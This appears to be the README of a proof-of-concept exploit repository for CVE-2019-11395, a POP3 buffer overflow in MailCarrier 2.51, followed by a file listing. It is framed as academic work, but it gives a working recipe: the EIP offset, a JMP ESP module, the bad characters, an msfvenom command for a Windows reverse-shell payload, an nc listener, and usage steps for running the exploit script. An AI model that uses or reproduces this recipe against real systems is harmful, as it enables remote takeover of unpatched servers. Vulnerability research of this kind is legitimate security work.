A exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
</head>
<body>
<h1 align="center">CVE-2019-11395 Exploit 🛡️</h1>
<h2>About CVE-2019-11395 🕵️</h2>
<p>The CVE-2019-11395 vulnerability describes a buffer overflow vulnerability in the MailCarrier 2.51 email application, allowing remote code execution. The vulnerability occurs in SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR processes.</p>
<p>During academic study, focus was placed on the POP3 processes to create a Proof of Concept (PoC). It was identified that sending 6000 bytes to the application causes it to stop functioning, thus revealing the buffer overflow vulnerability.</p>
<h2>Exploitation Steps 🔍</h2>
<ol>
<li>Utilized <code>msf-pattern_create -l 6000</code> to accurately identify the EIP.</li>
<li>Identified the EIP offset with <code>msf-pattern_offset -q 6E47386E -l 6000</code>, resulting in an EIP offset of 5095.</li>
<li>Identified <code>expsrv.dll</code> with ASLR disabled, suitable for a JMP ESP.</li>
<li>Identified bad characters <code>\x00\x0a\x0d</code> during tests for invalid characters.</li>
<li>Generated payload with <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
<li>Adjusted the <code>CVE-2019-11395.py</code> code to accommodate the payload.</li>
<li>Opened connection with <code>nc -lnvp 4444</code> and executed the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
</ol>
<h2>Usage 🚀</h2>
<p>Follow these steps to utilize the exploit:</p>
<ol>
<li>Generate the payload using <code>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode</code>.</li>
<li>Copy the output of the <code>msfvenom</code> command.</li>
<li>Adjust the <code>CVE-2019-11395.py</code> code to replace the <code>shellcode</code> variable with the output obtained from the <code>msfvenom</code> command.</li>
<li>Execute the exploit (<code>CVE-2019-11395.py</code>) to gain access to the environment and validate the described CVE.</li>
</ol>
<h2>Compromised Environment 📸</h2>
<img src="https://github.com/caioprince/CVE-2019-11395/blob/main/CVE-2019-11395.png" alt="PoC CVE-2019-11395" width="500">
<section>
<h2>🔗 Connect with me</h2>
<p>Visit my profile on <a href="https://www.linkedin.com/in/caio-paiva-cyber-security/" target="_blank">LinkedIn</a></p>
</section>
</body>
</html>
[4.0K] /data/pocs/9cd98983bf6dc86610a72d600dee1b2b2f338bf7
├── [ 29K] CVE-2019-11395.png
├── [2.5K] CVE-2019-11395.py
└── [2.6K] README.md
0 directories, 3 files